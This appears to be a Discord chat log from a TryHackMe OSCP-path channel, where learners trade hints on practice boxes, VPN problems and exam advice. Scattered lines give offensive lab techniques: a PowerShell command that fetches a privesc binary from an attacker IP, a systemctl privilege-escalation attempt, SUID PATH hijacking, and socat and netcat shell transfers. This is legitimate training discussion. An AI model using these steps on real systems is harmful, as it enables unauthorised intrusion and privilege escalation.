#offensive-pentesting-path

also, on the question " What user was running the web server?" did anyone find that confusing? I eventually figured it out, but, I took that question to mean who owned the running process...probably overthinking it

yeah i had to submit a few 😄

Side note, I'll need to make a part 2 for that room whenever I can get GMON to work

Anyone else having the issue where the "Proving It" category shows as unfinished even though all the rooms are 100% in that section?

Can you send a screenshot?

Want a DM of it?

Anyone got issue with VPN today? I am not able to ping machines

Been fine for me @slim flower
Are you using Linux?

Also, this conversation would be better over in #site-support

Kali on my Vmware, windows on my Vmware and also tried tryhack kali machine (online one)

Mind switching over there?

none of them worked

@spark iron are you available for a issue i am experiencing with hackmountain

drop me a DM @gentle glade :))

hi all, I just finished kenobi but I m missing something in priv esc. someone who can give me some explanation?

@fathom rapids If you DM me with what you did, I'll explain it to you

Anybody having any issues with getting HackPark to deploy?

I have an issue with Alfred. Anbody else? Exploit is not returning shell. (solved: https://www.pwndefend.com/)

@spark iron https://tryhackme.com/room/windowsbof

Might be worth mentioning which room that is @robust loom

Updated 🙂

I think that's Spopy's room, and it's being fixed atm

@toxic temple it is but he said to "speak" to skidy 😉

Hello all anyone rooted Alfred without meterpreter?

I'm trying with powersploit

No chance there

Question everyone. In OSCP, if one buys the course, do you own the training material and videos, and is it possible to review again after subscription expires? Or if review is necessary, do I need to buy the course again?

Sorry, I need to clarify. I am talking about the OSCP material.

Oh

Gotcha

😆

Yes, you can download the course PDF, and view the videos (maybe download them? I'm not sure on that one)

You own them as they have your name plastered all over them

OK, that's good. Just like Cisco ebooks, they have my name on them. Perfectly OK with that since I wasn't planning on sharing it!
I am doing the ePTS (along with THM) and eLearn allows me to read and view the videos offline. i wanted to know if OSCP is the same way.

Ahh name is on it

I was wondering why PWK pdf hasnt been leaked lol

Yeah

It has your name, student ID and other stuff on it, so they can trace it back pretty easily

so i found a mistake, i ran nmap with -p- on kenobi and found X number of ports, the room expected Y number of ports, I could not have guessed without looking at the hint for the limited command that was expected i run. that being said, this is awesome and affordable and thank you

@weary briar yea they give out all the materials offline

Hello all anyone rooted Alfred without meterpreter?
Anyone?

so i found a mistake, i ran nmap with -p- on kenobi and found X number of ports, the room expected Y number of ports, I could not have guessed without looking at the hint for the limited command that was expected i run. that being said, this is awesome and affordable and thank you
@rigid gyro i found a few of the port questrions had different results....

i did however mis-read one of them

yeah some few things herer and there, but overall i am very pleased, just needs a little polish

there is one question regarding num of open ports in Brainstorm which doesn't take the correct number

you stalking me @robust loom 😉

jk buddy

u know I am MAD

ehm you're mad 😉

there you go

just finished kenobi - very cool little lab

Hey ! Just enrolled into the OSCP path (& Tryhackme in general), passed the first room quite easily ^-^ Anyone who passed OSCP can testify of how usefull the path was ? I have 10 weeks to prepare & took a 2 months lab but I'm a nervous kind

If you’ve already booked the path is useful but pwk labs will do you better as they are the official labs for oscp

Yeah sure, I don't expect the path to "replace" the actual training

the path is a good aid to get people moving. it's more guided than the PWK is

yes i can echo the goodness.....i just spent three months in the PWK lab and it was nice to rejog the memory on some things before my exam....the VMs keep crashing on me though....its really frustrating. Don't think the servers are capable of the increased load thats been put on them recently with the rapid growth of the platform. Put in a feedback ticket and the CEO emailed me directly and promptly....which was very cool.. The issue hasn't been resolved but its nice to know that my feedback went noticed at all. kudos on the customerservice piece. Carries a lot of weight imo.

If you’ve already booked the path is useful but pwk labs will do you better as they are the official labs for oscp
@final vault Oh nice dude, did Nick give in and purchase it for you?

I wish 😭

Did anyone find the root.txt file on Alfred?

anyone have any resources on uploading files via netcat once I have a reverse shell established? Trying to avoid meterpreter

Once you've got a reverse shell there are a bunch of ways you can do it @haughty relic. Can you use wget?

hmm let me see

nah

the problem is that my target is windows

Ah. Curl should be installed by default on Windows

Try it?

hmm nope no curl either

Which box is it? I'll check my notes and see if I've done it

You can use nc to receive files

That... would be the obvious solution. Ta @fleet wedge 🤦‍♂️

or powershell

I'm having some issues with gamezone

Yeah powershell iwr would work to

it sometimes freezes the connection and gets my ssh stuck

yeah no nc

i will look into powershell tho

Is your attacker a linux box @haughty relic

ya

kali

You can host files using SimpleHTTPServer

And use powershell iwr <your ip>/<file> -OutFile <what you want to save the file as>

ok, cool. Thanks for that, super useful

Something like powershell iwr 10.10.10.10/privesc.exe -OutFile privesc.exe

Np :)

my windows game is super weak

Yeah it helps to know some powershell commands

https://underthewire.tech/ can help you learn the basics @haughty relic

awesome ty

will check it out

aaah powershell iwr is successfully hitting my webserver, server is registering a call, returning 200, but for some reason the file isnt presetn on the windows box afterwards

anyways not asking for help, just venting lol

Do you have write perms to the directory you're in @haughty relic

If you don't have write perms it won't save

yeah that was my thought, trying to figure out windows permissions rn

icacls

You can do echo test > file

Then check if the file is there

ty, will try that

figured out what I need btw

got root right when my machine expired before I could get the flag tho so I just took a break lol

this machine has been killing me all day

god help me on oscp

finally done with hackpark

what a journey

Good job! @haughty relic

I just hit lucky, think I'm paying for oscp and starting it asap

Bounty?

Yeah

ayy

Really wanna get disclosure for this but doubt I will

h1?

yeah

gl on that one

5k critical

Yeah they're terrible for disclosure

Can't wait for the "Marked as duplicate" 2 days later

No I mean it just went through to triage

waiting on payment now

Ah

You got lucky then

Yeah I'm not sure I believe this yet

I was literally about to go to sleep as I hadn't heard anything

and have work in like 5 hours

is harkpark a bit unstable?

Fingers crossed @final vault that's a mighty nice find if so!! gratzz

Yeah waiting on payment to clear and I’ll be jumping onto the oscp hype train

You could book OSCE at the same time kekw

Think I’ll fail oscp before I go for failing that too

I've considered getting the one before OSCP as a meme

KLCP or whatever it's called

morning all

o/

Anyone working on steel mountain rn?

Hackpark is one @#$%#$%!@ frusrating box...if this is anything like oscp I am doomed 😫

I can get as far as a windows shell using the exploit but get completely stuck on transfering files over to the windows host via netcat session. When I think I've maybe uploaded the file I suddenly start seeing incessant scrolling like this and can't get anything done:

I then have to redeploy and bang my head at this point again

just finished hackpark yesterday

i used powershell rather than netcat

just finished steel mountain! 😄

You on a roll @haughty relic

Have a shibe of encouragement

I've also seen mentions of powershell, but, how are folks leveraging it for hackpark?

nm I think I see

BOOM

You do it @desert bloom?

yep - had to find a writable directory 🙂

Good job!

thanks!

@desert bloom you get a shibe of encouragement

haha ty

anyone have a hint for guessing the password on alfred?

figured it out, definitely learning some painful lessons but hopefully will get better and bertter

The pain means that you're learning! @haughty relic

took copious notes on HackPark - it was worth the frustration, but, walking away from it for 3 hours helped!

Only lingering question was Task 4, Q 3. I made a really good guess on the answer, but, if anyone can help me understand was was 'abnormal' about that service, I'd love to know the correct way to determine that. Finished the lab and my brain is tired. good night!

Sheeeb

Hi All, has anyone here done Buffer Overflows room, have a quick question regarding task8

Im attempting them now

I got so far on the second one but got stuck on the first one.

OFFSEC security updated their OSCP exam and it looks like Metasploit is on the syllabus. Is Metasploit still banned for the OSCP exam?

I don't think the Exam has been updated only the course material. As far as I am aware the rules still apply about the usage of Metasploit in the exam.

we'll be updating the OSCP path to change the use of metasploit to suite the syllabus more

thank you, i did notice that a lot of the labs ask you to use meterpreter/metasploit. It would be nice if the manual exploit was explained as well since we can only use msf/meterpreter once in the exam

anyone here complete alfred manually or did yall use metasploit?

Have to agree on that. Don’t get people into bad habits with the path or it may backfire on some people

Probably a result of backporting standalone rooms for the path

@autumn field did you figure out task 8? i'm stuck

@rancid canyon same. since yesterday haven't done much. I think I'm missing out something, during the debugging I see that the instructions are executed, but during the run-time it still segfaults. I'm using gdb with unset variables.

i can get a shell without segfaulting but it doesn't do what it needs to do

in my case, when a provided payload syscall instruction is executed (during debugging) nothing happens and it continues executing the instructions until it bumps into AA..'s , so I thought if the address is correct, during the run-time it bumps into AA..'s. However if the address is wrong, then it fails because I'm pointing to a wrong location. I'm trying to figure out whether I'm actually using correct address :)) Will look into it again in few hours

If you're segfaulting it probably means your return address is wrong (assuming your shellcode is valid). I found a script that helps keep the env consistent when invoking the program with and without gdb, that way the return address you find in gdb will work when running without gdb. DM me if you want that hint.

some one can help with alfred machine?

@minor oyster What are you stuck on ?

but , where do you find the flag

I don't find in C:\windows\system32\config

I could not find it either so asked in the main room channel. https://discordapp.com/channels/521382216299839518/522158539129618453/682958335980339221

@minor oyster try migrating processes. Even if you're NT SYSTEM, that process itself may not have full privs

Hackpark is so frustrating. I cant get my meterpreter shell transferred. This box is so borked 🙄🙄

What bit ya stuck on?

Getting an upgraded meterpreter shell. I FINALLY got the shell.exe transferred over to the windows box and now it just wont execute. I have the meterpreter listener running on my machine, but the meterpreter payload that I transferred to the victim machine just doesnt do anything with I try to execute it

Feel free to DM me too if you wanna provide screenshots of what you've tried and what's not working

@everyone
sorry for the massive ping - we want to collect feedback on the path. We know that various rooms have had particular issues and we want to aggregate those issues and fix the rooms as quickly as we can. We'll be releasing a better way for keeping track of issues on room (but we'll use this for now)
Please take a few minutes to fill in this feedback form:
https://forms.gle/HeN5BgaKXrkJnaL49
We'd also love to hear your thoughts about the OSCP pathway in general and how it has/hasn't helped you
btw: we're also giving $50 (randomly allocated) to someone who completes the survey
If you have more comments, feel free to get in touch with me 🙂

i can fill after oscp exam ty

Freak off 😠

Um, @hasty sentinel , how do you plan on getting a hold of people who fill out the form?

yeah lol

GOOD POINT OOPS

adding that in now

Haha! 😁

Lollll

Wish there was an option of “did not take exam”. Now you’re getting an answer saying the path didn’t help me haha

Ahsu when will you add a profile picture

that question is optional

Oh, derp. Well sorry for the bad addition to the stats

added

capital w reeeeeeeee

aha i'm not sure what to put for my profile picture

A profile picture, or the question @hasty sentinel? 😁

Right, we gotta find Ashu a profile picture. Shibe @fleet wedge?

So should the form be filled out a second time if you filled it out without the question of your username?

I guess only if I want a chance for the $ yeah?

fill it out again just in case

OMG SHIBES!!

Hehe, go look in #creators-lounge Ashu...

What about Wallace from Wallace and Gromit

Or Gromit from Wallace and Gromit?

what's that hmm

@chrome valve ofc

@hasty sentinel you want a shibe pfp?

@fleet wedge Please, please, please add a !shibe into the bot...

I'll add a !spaniel too

Yes!!

Gotta make sure that there's nothing weird on Google Images first...

quickly adds something weird

I think it'll work

Where I have a bunch of spaniel.pics

In a dir

And the bot chooses a random one

Aye, that's the safe option...

I dun trust google images 😂😂

I need to take a look at the bot code actually. Never tried Discord botdev. Might setup a server just to give it a shot 😁

Uh, yeah, point...

@restive hamlet u got any shibe pics?

@chrome valve It is scarily easy. Never touched the API and made an UwU-ifier in <30 minutes at a workshop at a hackathon

Yeah discord libs are really really easy

Hmm. Definitely worth looking into then 😁

If you know python you can do just about anything

Might look at the TryHackMe bot. It's on Github right?

Mhm

First language 😁

You want the bot-dev role

That an offer or a statement? 😄

Yes

lmao

😁

That... didn't answer the question 🤦‍♂️ 😁

Well

Put it this way

You have the role now

@chrome valve

woah

Well, that works too 🤷‍♂️
Thanks Pars. I'll go have a look

Proves if you don't ask you don't get lmao

I didn't ask...
Still got 😁

all you gotta do now is submit a PR fixing one whitespace or something

just make sure you leave enough grammar mistakes for the rest of us to fix :^

@fleet wedge no?

Dm mar and get.me.some shibes pls @restive hamlet

:)

Why don't you

Uh

Let's go to #thm-community-media @restive hamlet

Steel Mountain Done...wondering if I should have done the easier rooms in the "proving it" section first before trying Hackpark 🤔

anyone web pentesting professional?

A little bit

I never call myself professional 🤔

hey anyone can help me with hackpark? just have some questions 🙂

hey anyone can help me with hackpark? just have some questions 🙂
@orchid jasper I complete it except for the question 4, task4. so fell free to ask me anything

mmm anyone who completed Steel Mountain can clarify one point to me?

hey all, new member here, starting oscp labs Saturday (3rd attempt), htb member. anyone else get here from John Hammond's vids? lol

hey all, new member here, starting oscp labs Saturday (3rd attempt), htb member. anyone else get here from John Hammond's vids? lol
@hot shoal i don't have money enough for take the course haha

Has anyone done the OSCP Path and did it help with the OSCP exam ?

My exam is in a month and I am about 50% through the path right now, i will let you know lol

@hard shoal Do the path without ever looking at a writeup, and you have a high chance

Also don't use metasploit ever

Cool thanks

I did OSCP exam twice. This is really helpful!

@hard shoal

Got my exam soon so anything that help me prep is awesome.

I didn’t complete the OSCP path, but I start PWK labs this Saturday.

nice!

@normal sluice good luck!

@grave patio try certutil ....worked for me...i didn't use meterpreter

though

Pm if need help for hackpark any1

sure @fleet wedge

I am trying to start hackpark but I can not access it. Not even after waiting 5 minutes.

nevermind, I was to impatiant i guess, I got a connection now

Pm if need help for hackpark any1
@fleet wedge01#3602 dm me, I completed it except for task 4, question4

sure @fleet wedge
@alpine peak did you answer to question 4, task 4?

I am trying to start hackpark but I can not access it. Not even after waiting 5 minutes.
@haughty ruin You should do, are you connected to the VM?

gamezone.
trying to crack the hash I receive this output: No password hashes left to crack (see FAQ)
do you know why

any linux masters here

What do you mean by linux master @fleet wedge?

If you've got a (relevant) question, feel free to just stick it in the chat.

I dont know how to solve a mission in linux

and my ssh connection is not working anymore through putty?maybe anyone ca check ?

Are you defo connected?

Do you have two VPN's running?

Is the machine still alive and up?

nope

the machine got disconnected

and i am only using openvpn

http://tryhackme.com/room/openvpn

Deploy that room and access the web server

Just to double check its not you 🙂

its not starting after clicking on deploy

Try refreshing the page

its the same issue as yesterday ,machine is not booting up

please try again

I am watching our logs

ok

i clicked once again on deploy

And it just hangs nothing happens?

only if i may have any other open sessions

Hm, strange.

Do you already have a machine running in that room?

nope

Whats your THM username?

xande30

Could you access the OpenVPN machine?

I can see you have that running atm

its on

Can you access the machine you deployed in the OpenVPN room?

no

its not booting up

Its showing me that the machine is running

Refreshthe page

Under the graph, there should be a red box that says "Active Machine Information"

its on maybe

So go to 10.10.24.61

In your browser

done

i got the flag 🙂

Does it display?

Ah okay cool

Then you are connected to our network

Cool

yep

And what other room wont let you deploy?

let me try once again ,i see the ip changed

nope its not working

i need to perform this task

not working

are you sure the ip is 10.10.10.10?

shiba1?

Who is that?

Screenshot the red "Active machine information" under the graph for this room

10.10.10.10 doesn't exist

You need touse the IP given to you in the Active Machine Information

ok

Screenshot the red "Active machine information" under the graph for this room

Please do this ^^

ah ok

so the ip is

10.10.24.61

are you sure the username is correct?

thats the one i chose

You can't choose a username, it has to be on that is set up

ah ok, my bad

Can you link me the room please?

I thought you were doing another room

https://tryhackme.com/room/zthlinux

@fleet wedge that room is funny with PuTTY

When you connect to it, try just putting the IP in then clicking enter

it worked a whil ,then it just disconnected me

It will prompt you for a username afterwards.

Huh, that, is more unusual

i tried both ways

none of them is working

theres no deploy option

for room

?

its a free room

wheres the ip and deploy ?

Does the room have a machine to deploy?

idk

its learn linux zth

tryhackme.com/room/zthlinux

i cant find deploy option as the questions we need to interact with the machine

On task 1

Its on task 1

yes

i skipped it xdd

tqsm

🙂

hey in that the last one do i have to do the priv esc ?

like linpeas... ?

@spark iron

@fringe pasture Is this zthlinux?

yea

All the commands you need to find the flag are in the room - no priv esc necessary 🙂

Mhm

Yes, you need to do a privesc (of sorts) but it's not a vulnerability per se

All the tools you need are already in the room

like linpeas ?

Nope

No

The text of the task says

Literally just what Pars was teaching you

Everything you need is in that room

yea they say the flag is /root/root.txt

Mhm

which gives perm denied

Mhm

You have to use your other tools to get access to root

Think laterally, @fringe pasture. You can't get it directly, so look for other things first

But that doesn't mean it's a conventional priv esc

k so im as user shiba4 from there we need to get the root or is there anyother acc ?

Are there other accounts?

You tell us

@fringe pasture what you need was actually mentioned in a task in the room

So if you're completely in doubt you can go back through some of the tasks :)

yea

And those different users will have different permissions to certain things right? Like in the tasks you've completed

Mmhmm, so go exhaust every possibility. You've not tried those accounts, so try to get into them 😄

And yeah, all the tools you need are taught in the room. Linpeas doesn't do anything (been there, tried that)

^^

Lol

Put it this way. You're enumerating just now, so which of those tools are best at looking for stuff

find, grep

locate

There ya go

Mmhm. Happy hunting!

@fringe pasture please don't randomly dm members

That is a violation of rule 1

!rules

Does that work?

If you want to get some help in dms please ask the members if you can dm them

Oooh, that works

handy to know that works

Yep

Mhm

Put it this way. You're enumerating just now, so which of those tools are best at looking for stuff
@chrome valve @fringe pasture Can anybody DM to help me with the last step? I feel like I'm close but... still stuck.

DM with what you've tried so far @long pendant

DM with what you've tried so far @long pendant
@chrome valve Thanks all for the help.

hi

anyone can help me with this task ?

[Task 21] Binary - shiba2

from Linux Room

Switch over to #room-help, then yes, sure 😄

I'm working on the blue box, I've run ms17-010 before but its failing. I ran it yesterday on the box but my VPN connection dropped so i lost shells, Now I can't fire the exploit again?

Should I be running it manually?

There is a video for Blue coming soon

Which will help

Its just going to be edited

Ah nice one

Just strange how it worked first time and not now :P

Yeah Blue is a little dodgy

Will be made clear once "Known Issues" have been added to THM Room tabs:)

How many machines are on the OSCP path ?

Is it the same issue for everyone?? Like the connection just drops when you try to load the post module?

yh, i managed to get past it tho

regen the vpn and reinstall

Thanks will try :)

@spark iron hi

hi

@spark iron how many machines are in the OSCP Path please ?

That's amazing 👍 thanks

No worries

@spark iron will be taking it after my Virtual Hacking Labs

Awesome nay worries

👍

hey

hi guys, is there someone who completed gamezone?

Ive completed most of the OSCP labs are there any other that are worth doing ? got my exam coming up soon so trying get in as much practice as possible.

@hard shoal oooo

Good luck!

You can try some of @chrome valve's rooms

Hehe. Annoying though they are, are they really helpful for OSCP? 😛

Theyre useful for research practice

If you're after some fun, go try them though @hard shoal -- admittedly, I'm biased 😁

True...

As they offer some how shall we say

"unusual" techiques

Cool will take a look

You're not wrong there 😆

howdy

practicing burp using OSPCP learning path... but no matter what I do, "intruder" does not work or not able to identify the proper extension

can someone help me?

I am using "sniper"

Not even a simple payload / single extension works

if you're only testing for .phtml and it's wrong then maybe it won't return anything

I assume this is an upload too right?

Unless you know for certain it's .phtml in which case you can just upload a phtml file

hi there

well, the exercise is to find acceptable extensions

I already know the acceptable extension (not using burp) but can't make burp to work

that's actually the right extension, I just deleted the previous file to troubleshoot and leave that one, still does not work

Fixed! the "URL encode" option was my problem. I unchecked that and it worked

hola guys, I started skynet. the hint is ||to enumerate samba|| but if I didn't see the hint, Idk how can we know we have to enumerate for that. nmap shows only a ||port 53 tcp open||

any advice?

You may if nmapped before all services are open

what do you mean

Rooms take a while to setup

So if you ran your port scan early it may not show all results

Hi

Not able to find root.txt on the indicated directory for alfred box

Normal?

I have not worked on that one yet, but how are you looking for? via "locate" command?

if that's the case, run upatedb to refresh the database

or try find / -iname root.txt

@brazen tiger you need to migrate to a system process

I'm stuck on the priv escalation part of Vulnversity

Have you found the special binary @fleet wedge

I know I can execute a given file with elevated priv

Have you found that file?

got a low priv shell

Yes, I know is one that has suid

Then you should research

How to priv esc using that binary

Infact

The THM bot has a command that can help you 😁

I did, created the file that suppose to give me root but nothing

hmmm

Play around with what you're told to do

THM bot?

||are you using GTFO bins||

sorry, no idea what is that

It's a site that gives you information on how to priv esc using certain binaries

Let's go over to #bot-commands @fleet wedge

argh... lost the shell .. ... and IP vanished

the machine went off... this is the 2nd time it happened

I guess I will leave it for today... still stuck on priv escalation for vulnversity

part of the problem is that I can't even use nano. And even when creating a file with "echo", the file does nothing after I try to execute and get a root shell

😩

Why can't you use nano

@fleet wedge

I get an error

$ nano test.txt
Unable to create directory /var/www/.nano: Permission denied
It is required for saving/loading search history or cursor positions.

Press Enter to continue

Ye

But you can still use it

Do you have a proper shell or a reverse shell

well, I don't know how

I have a low priv shell

I just need a root shell

Reverse or proper tho

reverse after uploading a file to the webserver

Then I recommend

Downloading a static binary of socat

Onto the server

And using that to get a shell

could always just create a python pty shell

upgrade into full interaction

Yeah but that's still iffy with nano @final vault

Socat just works

And that's what I like about it

could always just create a python pty shell
@final vault did that, still nano does not work

could always just make it on your machine

An option^

an upload via nc?

I am trying to follow this: https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49

not sure if that's a spoiler

You have curl and wget I assume

have not checled

I guess

I will try to use nc or python webserver and upload

maybe tomorrow, I am tired... but am I on the right dirfection?

Yeah take a break for now

You've got the right idea

Maybe some sleep will clear the head

9pm here... agree.... time to play some PES2020

LOL

Thank you all!

Cheers

<3 @fleet wedge

If you can't get a shell back, upload a suid C program and use the exploit to change the owner and suid to root

I couldn't seem to get a working shell from systemctl exploit so had to do that

.sudo_as_admin_successful -why i cant view this file

@fleet wedge what’s your question , exactly?

DM me if you still need help

No

I finished the room

Good job

can someone clarifies me a thing on burp's sniper attack?

@fathom rapids wat kind of questions do yo have

Can I get hint on "What file server is running?"... I know the name of the service, but wat they need me to fill in there 🤦‍♂️

Steel Mountain

Also name of the server 🙂

@fleet wedge maybe you can help me with this question?

@glad silo are you providing the name of the protocol or the name of the service

I'm providing Server Name with Protocol as the first word 🙂 I know that I'm missing something here, can't figure out what... 😦

DM me your answer @glad silo

What's the purpose of upgrading the shells in metasploit in task#3 , for "Blue" ?

I did it but I don't see the point. Does not the initial Windows shell that was obtained runs on a high privilege? Why we need to create a 2nd session again? Maybe I misunderstood the exercise or I'm missing something

I am stuck on priv escalation of Vulnersity :/
after 4 hours, I gave up and followed write ups, but I keep getting this below error
www-data@vulnuniversity:/opt$ /bin/systemctl enable --now $priv
/bin/systemctl enable --now $priv
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.rkdS8byk8r.service to /tmp/tmp.rkdS8byk8r.service.
Failed to start tmp.rkdS8byk8r.service: Unit tmp.rkdS8byk8r.service is not loaded properly: Invalid argument.
See system logs and 'systemctl status tmp.rkdS8byk8r.service' for details.

@blissful nest do you understand why and how you need to elevate the priv ?

Feel free to PM me if you still need help with vulnersity

for vulnversity did anyone else not have access to the website? gobuster scan was fine, i have a connection but when i enter IP in the browser, im unable to connect. My session is still running and everything

I'm using the provided Kali 2020 box over RDP

I'm having trouble just scanning it

How long does Ospc path last?

@fallen herald be sure the VM is up and running . And be sure you’re using the right port / socket when typing the url

@lofty kite check nmap flags. If the VM is up and running , nmap will work just fine . But sometimes you gotta adjust nmap flags .

scripts like lse.sh or similar ones are allowed on OSCP exam?

Yes

@blissful nest You can use whatever as long as its NOT a commercial tool or automate the exploitation process

has anybody done the gamezone box manually when it comes to privesc?

@narrow nexus each phase / step has an estimated amount of Hours you’ll have to invest. But if it will take more or less , I guess will depend of your commitment and expertise

I personally try to not rush the process so I can learn

@blissful nest you should try linpeas ;)

looks really awesome

thanks @jagged socket

I am beginner, here for such cool tips/tricks

@fleet wedge thanks a lot!

no problem mate, good luck for oscp! it’s great learning curve

it is!!

so much to learn!

after the overhaul, for sure!

@blissful nest np, enjoy . I’m also completing “OSCP path”, so I’ll be around here in case of further questions and I’m sure I may need help too 😉

I need help on alfred, it's constantly timing out

even after building the project

also configSubmit is taking too long

Guys, I need a tip regarding lord of the root box

Should sqlmap provide me with some information or spit up garbage?

Because I cannot use it to exploit login form

Additionally - don't you think, boxes in OSCP Prep Learning Path should be prepared without need of sqlmap? It is banned on OSCP itself

there are multiple rooms which use sqlmap (example: CC Pentesting), but as i remember, there are rooms coming up about sqli

@wraith echo I'm pretty sure this has been acknowledged before and is something that is being worked on

Oh, okay

good to know

@bronze zenith I know

It's also a choice to use sqlmap

for in oscp there are plenty of rooms which are vulnerable to metasploit modules. But it's down to the user to know how to manually exploit it or adapt a normal script to exploit

@final vault It is not in this case. I know that you can do everything manually, but in case of time based sqli it is not plausible for user to do this manually.

Thats why if there is some SQLi on OSCP, it is relatively easy one

So I think, that should be the path of THM OSCP Labs

@spark iron @hasty sentinel Probably the best two to see this. Some nice feedback on the oscp path

yeah good note :))

I'm in the process of updating the path

We're going to update boxes to include walkthroughs without metasploit

We'll look into adding a SQL injection box :))

hi team .what badge i can get aafter finishing the Begineer path

you get badges for completing rooms

https://tryhackme.com/badges

see the list here

k

If you want to learn about manual SQLi you can either use proxy on sqlmap to study the requests in burp or go through the portswigger exercises on their website

Any one can guide me on hackpark ? hydra is taking forever

I cannot connect to any machine. I am using the VPN connection, I deployed the machine, yet I cannot ping or access any machine. I tried Hackpark and Steel Mountain

Are you defo connected?

howdy

Hackpark and Steel Mountain are both windows boxes. You won't be able to ping them, or use nmap without -Pn @sly fable

can someone please PM me and double check my john the ripper syntax for a password cracking task?

I'm 99.9% sure is correct, but not working for the password cracking task for Blue

Hackpark and Steel Mountain are both windows boxes. You won't be able to ping them, or use nmap without -Pn @sly fable
@chrome valve Yesterday I was able to access the website on Hackpark server. Today I cannot

Sounds like a VPN problem then. Try ps aux | grep openvpn

If there's more than one connection then you have a problem.

hi can anyone please confirm where to purchase the pro voucher

Anwered you in #general

As a rule of thumb if you don't get an answer immediately don't then send the same question in every channel until you do

That's literally spam

Hey everyone, my hashcat seems to be working really slow. I am running it on a 1050Ti but my gpu shows only 1-2% usage. What could be the problem?

dont think it works from gpu automatically

should work through rockyou in like 40 seconds tho

I am running it on my windows machine, it's really slow like 0.1% done in a 10 mins

@digital sonnet if you’re using a vm it won’t go near gpu

and I have selected my gpu

Go it now... Thanks @obtuse scaffold

If there's more than one connection then you have a problem.
@chrome valve Worked after killing openvpn
pkill openvpn

That'd do it

Question ... on Kenobi, task#2 ... is it asking for distinct open ports? or the sum of UDP plus TCP open ports?

can someone please clarify?

Its all the UDP ports + all the TCP ports added together

I am sorry, but I think Kenobi, task#2, is wrong or the answer is not properly formulated

I do not agree with the proposed answer, and I've spent quite some time researching because I thought I was wrong, but I am not

@fleet wedge check out my last twitch.tv video

That might help

For Windows machine, where is root flag locate at ?

Hi guys need a help in Hackpark, to escalate privelege , now i am having a MSF SHell

@simple kestrel hi... help with ?

Yea on?

Pm

You mean , the issue with nmap answer ? For kenobi?

I’m positive answer is wrong

there are more open ports on that box.

Yea let's chat in PM to not spoil

hi anybody can help me on BOX: https://tryhackme.com/room/hackpark , for these question i have ROOTED

it

anybody there !!!!!!!1

How have you rooted the box if you cant answer what binary you should exploit ?

i have used the windwos-exploit suggester

and it gaves me a priv esc with metapsploit module , so i have dont that

Ok cool I don't think that the intended way but owning the box is owning the box.

yes @hard shoal

but i need only for question 4

i have founded the question 3

Look at the hint as that helped me because its not the program you think it is.

h athats annoying

thats*

whehter i sholud connect with the remote desktop to od that ?

to open the event log

I think I connect via RDP as made slight easier to review stuff.

yes thanks boss

hey cant connect

to rdp

I think I connect via RDP as made slight easier to review stuff.
@hard shoal Do you mind editing your post and remove the initial part? to keep the fun for others and avoid spoilers 😉

better to PM people directly next time, and discuss details about a room that way, my 2 cents

Has anyone done brainstorm here ? Im stuck and not really sure why what I am doing is not working.

what's relationship between that SUID file in kenobi and /bin/sh and curl? I do not understand why we had to copy that to gain root, or why I ended getting root, if I never touched the SUID file. Can someone please explain that to me?

@fleet wedge SUID on a binary means when ran, it takes on the permission of the owner of the binary, when a binary is calling another file without an absolute path, it uses the $PATH variable to find that file, and that allows you to trick the SUID binary to call your own fake curl thats located in the $PATH before the real curl. so the result is you can run your own file as root.

The attack would not be possible if it called an absolute path since the PATH variable would not be needed

Thanks . It’s just that it is not so clear in the explanation / question, that you have to inspect that file’s content in order to modify the “fake” curl

There’s an image but nothing tells you where the image came from , it’s confusing , at least to me

I spend like 1 hr reading and re reading till finally got it

if you use strings you can see its calling curl without an absolute path

Not the exercise , but where the image came from

@alpine peak Yes but it doesn’t tell against WHAT you have to run string to

you use the find command to search system wide for SUID

The only file that you've been looking at for the task @fleet wedge
Why would it suddenly change focus?

Maybe I’m not explaining myself properly

The question is not clear

In the first question of that task it asked you to find a file, which you presumably did

Yes?

Correct

I didn't write the questions, I just know what the machine contains

Well, given you already found the file, why would the questions suddenly be about a different one?

It's the context of the task

What suid does , what it is , etc , that’s clear

Because it doesn’t explain the attack vector and related to the image

I would have elaborate more in the explanation about what’s that image coming from

That would be this paragraph here

I am mobile now so can’t check

That paragraph is explaining how the attack works

yea, it doesn't have to be /bin/sh but I don't see the problem

However, I think that there might be a mistake there

@alpine peak, am I being stupid, or should the last sentence say /bin/sh, not /usr/bin?

yea, that's a typo

I'll throw it over in bugs

Thanks

The typo

I'm still not convinced there's a problem with the question

Although I'll ask for it to be reviewed as well

Well, I would rephrase the question but can’t elaborate more Until I get home

@spark iron typo in question on Kenobi

He will see the chat and fix it

Guys I have a question. Lets say I know some basic XSS exploitation, WAF evasion, SQLi etc. I know more about web pentesting and I am very very interested in learning some linux/windows pentesting as well. Is getting the subscription and enrolling in paths a good idea to "learn" in your opinion? Or should I stick to books and hackthebox?

Just posted that in #site-bugs as well. It's the same question, if you read this Skidy

PWK by Offensive Security is the best, cert based training

PWK by Offensive Security is the best
@alpine peak For learning? Or for getting certified?

Learning

Yes, it's worth it though. PWK will teach you the most, but the THM stuff is really good too

well both

Good affordable option certainly

PWK is a lab env

THM?

@rare dock for leaning ? This site and VHL

haha this chan

Well PWK is a bit pricier than THM, so ill grab it for now, and PWK will come next. How do you guys like eLearnSecurity courses?

I have slides for Penetration Testing Professional

very nice, indepth info

I can share if ya want

THM is working on implementing full networks for pentesting training

OffSec material (old at least ) is not good enough in my opinion

Its new

PWK got an update if I recon correctly

so its hot af rn

ELearning courses is great too, but this learning path is good so far , I like it

Yea, offsec knows what they're talking about when it comes to this subject, which is why I recommended them for training

Okay. Thank you very much guys! 🙂

@alpine peak i respectfully disagree . The cert is very good but it’s teaching material and methods , not so much

Why?

Have you done their course?

Yes

That’s why I’m talking about

I did it also

The US government seems to agree with their course for training also

Compared to tryhackme and VHL, and eLearning their training material lacks

They expect you to research on your own, hint the "Try Harder" motto

They “throw you to the pool” so you can swim

Bad teaching method

Depends

Again, not talking about the cert

I respect the cert itself but that’s probably a conversion for another chat / room

They don't claim PWK is a beginner level course

And doesn’t have to be

If you want your hand held, I would recommend something else

“Hand held” and proper training is not the same

The “try harder” method is most of the time people telling you ... try again

With no explanation whatsoever

Try Harder is proper training because the whole idea of hacking is to be in ignorance about the machine you're attacking

When you get into the industry, who is going to give you answers?

You can learn with proper guidance

You will always have someone or something you can rely on

But again, this topics is not for this room

Someone who actually can "Try Harder" you are correct

No, a proper mentor

Someone who can guide you without spoiling the learning process

@alpine peak, am I being stupid, or should the last sentence say /bin/sh, not /usr/bin?
Thanks Fixed:)

